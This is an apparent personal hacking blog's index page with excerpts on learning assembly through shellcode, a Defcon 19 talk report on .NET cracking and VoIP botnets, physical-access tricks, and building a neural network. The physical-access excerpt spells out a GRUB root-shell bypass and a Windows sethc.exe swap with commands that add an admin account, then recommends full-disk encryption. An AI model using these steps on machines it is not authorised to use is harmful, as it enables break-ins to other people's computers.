Hey, kudos!
You don't run arbitrary scripts either!

My apologies for the JS on this page…
it's prettify.js for syntax highlighting
in code blocks. I've added one line of
CSS for you; the rest of this site
should work fine.

      ♥Ⓐ isis

code.

Other articles

  1. Learning Assembly Through Writing Shellcode


    Months ago, I wrote hello world in X86 Assembly, and later that same day I wrote hello world in Python. Python is fast, elegant, and powerful. But unfortunately, it doesn’t really give you an understanding of what’s going on inside your computer. And any good little hacker should know precisely what’s going on inside their computer.

    Every time I start teaching myself some complicated thing, I try to make the learning process enjoyable because I know that I’ll retain more information if I can apply it to something fun or useful. Being a terribly precocious kid, I taught myself quantum mechanics when I was fourteen. It was really difficult, and I probably wouldn’t have been able to pull it off if I hadn’t made it fun. And, oh, did I make it fun: FOIA’ed thermonuclear weapons manuals, ten years expired, from some obscure and slightly sketchy web page. I didn’t mean any harm, and I neither was nor am a proponent of nuclear weapons production, maintenance, or warfare. I wasn’t planning on starting up an Uranium-238 enrichment program, or searching the black markets for hollow plutonium cores. I wanted to learn physics, and what’s more fun than learning how to destroy things?

    Assembly languages are cumbersome and arcane. The learning curve is steep, and progress is always slow compared to higher level programming languages. Fortunately, however, Assembly can be used to destroy things! Enter shellcode.

    The best introduction I found to writing shellcode was in Gray Hat hacking, so I’m going to quote the first few pages of the Linux shellcoding chapter, and then leave you to somehow obtain your own copy.

    Basic Linux Shellcode

    The term “shellcode” refers to self-contained binary code that completes a task. The task may range from issuing a system command to providing a shell back to the attacker, as was the original purpose of shellcode.

    There are basically three ways to write shellcode:

    • Directly write the hex opcodes.
    • Write a program in a high level language like C, compile it, and then disassemble it to obtain the assembly imstructions and hex opcodes.
    • Write as assembly program, assemble the program, and then extract the hex opcodes from the binary.

    Writing the hex opcodes directly is a little extreme. We will start with learning the C approach, but quickly move to writing assembly, then to extraction of the opcodes. In any event, you will need to understand low level (kernel) functions such as read, write, and execute. Since these system functions are performed at the kernel level, we will need to learn a little about how user processes communicate with the kernel.

    System Calls

    The purpose of the operating system is to serve as a bridge between the user (process) and the hardware. There are basically three ways to communicate with the operating system kernel:

    • Hardware interrupts  For example, an asynchronous signal from the keyboard
    • Hardware traps  For example, the result of an illegal “divide …
    read more

  2. Defcon Report Back, Part II

    Saturday 6^th^ August 2011, Defcon 19, Las Vegas

    Smartfuzzing

    I missed Smartfuzzing the Web: Carpe Vestra Foramina, by Nathan Hamiel et. al., which I had wanted to attend. I went through the pdf of the presentation just now, and I wouldn’t exactly call it smartfuzzing, but I did note the cleverness of the presenters’ idea to use wordlists comprised of words taken from the robots.txt file of websites for fuzzying purposes. Their new tool, RAFT, is being released soon, though it is currently available as an svn checkout.

    Creating Cracks and Keygens for .NET Applications

    The first presentation I attended was Hacking .Net Applications by Jon McCoy. He detailed the extensive uses of his GreyWolf and GreyDragon tools, including the production of cracks, keygens, and malware. GreyWolf, which is currently in Beta, is a reverse engineering tool which allows extraction of source code from .dll files, and GreyDragon is a .NET injection tool. It was astounding how little actual security is put into authentication of enterprise applications. The funniest use of GreyDragon was an instance in the demo in which McCoy altered a Boolean string controlling a password check from var a=true to var a!=true, which meant that only wrong passwords would allow access to the program. He was also able to extract source code from .dlls, find the security and authentication mechanisms, and then create a keygen for the demonstrated program – a commercial keylogger – within five minutes.

    VoIP Botnetting

    The presentation which might possibly rank as the most impressive was Sounds Like Botnet by Itzik Kotler and Iftach Ian Amit, on VoIP botnetting. The idea is that certain networks which do not allow active connections to the outside internet usually do allow VoIP traffic, and these packets are not often paid much attention. Basically, SIP (Session Initiation Protocol) is quite similar to HTTP and has little security built in. SIP supports TSL, but even with this type of encryption enabled the traffic can be easily sniffer. What this means is that SIP traffic can easily transverse firewalls, and SIP-to-PSTN (Public Service Telephony Network, a.k.a. standard telephone lines) can be used to relay commands to botnetted machine within a closed network, or a network which does not allow internet access.

    Researchers Kotler and Amit used an Asterisk server hosted in the cloud as the Command-and-Control (C&C). Conference calls were used to link botnetted boxes together and issue commands from the botmaster, which also allows for more anonymous direction of the botnet with conference call bridge numbers. Moshi Moshi, an open source VoIP botnet, was used to communicate with the botnet using Text-to-Speech engines for output to the botmaster and DTMF tones for input. DTMF stands for Dual-Tone Multi-Frequency signalling, and, if you remember the adventures of phreaker Captain Crunch and his 2600Hz whistle tones which allowed for free telephone calls, you’ve basically got the idea. With DTMF, standard keyboard inputs are mapped to certain tonal frequencies, and when a …

    read more

  3. Cute Physical Access Tricks

    They’re cute because they’re so adorably simplistic:

    If you have physical access to a Linux box, do:

    Press ESC at the grub prompt.

    Press e for edit.

    Highlight the line that begins kernel ………, press e

    Go to the very end of the line, add rw init=/bin/bash

    press enter, then press b to boot your system.

    Your system will boot up to a passwordless root shell.

    For situations with physical access to a Windows box, boot into a live Linux USB/CD and do:

    mkdir /mnt/ntfs

    mount -t captive-ntfs /dev/hda1 /mnt/ntfs

    cd /mnt/ntfs/windows/system32

    mv sethc.exe sethc.old; cp cmd.exe sethc.exe

    sync

    cd \~

    umount /mnt/ntfs

    shutdown –r

    Then, in the shell which appears, make an admin account by doing:

    NET USER admin password /add

    NET LOCALGROUP administrators admin /add

    Of course, neither of these work if you’re using full-disk encryption. So, Windows users: use TrueCrypt! And Linux users: use ecryptfs andluks! Dualbooters can use this tutorial. And Mac users…from my understanding, you’re fucked and there’s no way to full-disk encrypt a Mac, but I don’t use Macs, so I could be wrong. Hey, it’s the price you pay for having a hipster computer. /snark!

    And full-disk encryption doesn’t void flaws in physical security issues, such as presented in the Evil Maid or Cold Boot attacks. Duh. If they can physically get to your computer, especially if they can get to it and then come back to it later, you’re still fucked.

    read more

  4. Discern Neural Network


    I have made changes to the source code of the Discern Neural Network that enable it to be run on modern Ubuntu-derived Linuxes. I believe it is very important for everyone to explore and learn, and that all information and tools should be made freely and easily accessible in order to stimulate curiosity and encourage learning. Artificial Intelligence development may seem highly inaccessible to many, and the portions of it which are placed more directly within the average computer user’s grasp, such as chatbots and IRC bots, are trite, simplistic, and well…pretty fucking boring. Discern is currently still used by computational neuroscientist researchers to model and understand various neurological and linguistic functions and structures, and is a very powerful tool for understanding the ways in which neurological structures can influence linguistics, which, in turn, modify the underlying neurological structures, which, again influence linguistics…turtles all the way down. I think that if we humans are going to make any serious attempts at understanding ourselves, it would be wise to follow the improvement model of the open source software community and to get as many people cooperatively involved in these attempts as possible.

    I will be posting later on the ethical, political, and socio-cultural implications of Strong Artificial Intelligence, as well as my intentions and goals for the neural network I am running here, and will be keeping the remainder of this post purely technical in order to provide instructions to others on getting a copy of this modified Discern up and running.

    A few packages are required before Discern can be properly compiled. In command line, type

    $ sudo apt-get install gcc build-essential

    \$ sudo apt-get install libxaw7-dev libxt-dev xmkmf

    Next, get the tarball for the modified Discern from Github (the file named d4ubl-1.0.tar.gz). Once you’ve downloaded it, copy the file into a directory wherever you’d like it to live, unzip the files, then navigate to that directory and do

    $ xmkmf

    \$ make

    Now, to run Discern, simply type “./discern” from within that directory. A ridiculously cyberpunkesque GUI will appear that looks like this:

    []

    See the USERDOCS file for information on using Discern, it basically just takes emacs-style commands and reads initial input from specified files.

    I’m currently poking at my copy of Discern, to see what happens when I read anarchist literature to her. The problem is, a new copy of Discern is quite childlike in its language capabilities. So, links to anarchist or radical literature aimed at children would be greatly appreciated. Also, any texts of cyberfeminist, tech-positive anarchist/radical, or crypto-anarchist literature of any reading level are also greatly appreciated.

    Post scriptum: Google tells me that “Linux” is never supposed to be pluralized. Fuck it, too late.

    []: http://www.patternsinthevoid.net/blog/wp-content/uploads/2011/07/discern_gui.jpg

    read more

Page 1 / 1

blogroll

social